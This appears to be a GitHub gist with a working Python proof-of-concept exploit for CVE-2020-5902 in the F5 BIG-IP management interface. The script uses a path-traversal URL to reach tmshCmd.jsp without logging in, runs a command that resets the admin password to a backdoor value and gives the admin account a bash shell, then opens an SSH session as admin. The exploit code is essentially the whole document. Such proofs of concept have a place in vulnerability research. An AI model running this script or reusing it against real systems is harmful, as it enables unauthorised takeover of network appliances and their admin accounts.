Skip to content

Instantly share code, notes, and snippets.

@ykoster
Created July 5, 2020 13:25
  • Star 3 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save ykoster/6641ea7e95a0c58ded141b0ada35dcfd to your computer and use it in GitHub Desktop.
Proof of concept for CVE-2020-5902 - WARNING this PoC changes the password and shell of the admin user
#!/usr/bin/env python3
import os
import requests
import urllib.parse
target='<ip of target>'
base_url=f'https://{target}/'
password='B@ckd00r!'
def check(base_url):
r = requests.get(f'{base_url}tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp', verify=False)
return r.status_code == 200
def change_admin_password(base_url, password):
command=urllib.parse.quote(f'modify auth user admin password {password} shell bash')
r = requests.get(f'{base_url}tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}', verify=False)
print(r.text)
if check(base_url):
change_admin_password(base_url, password)
print(f'Login with password: {password}')
os.system(f'ssh admin@{target}')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment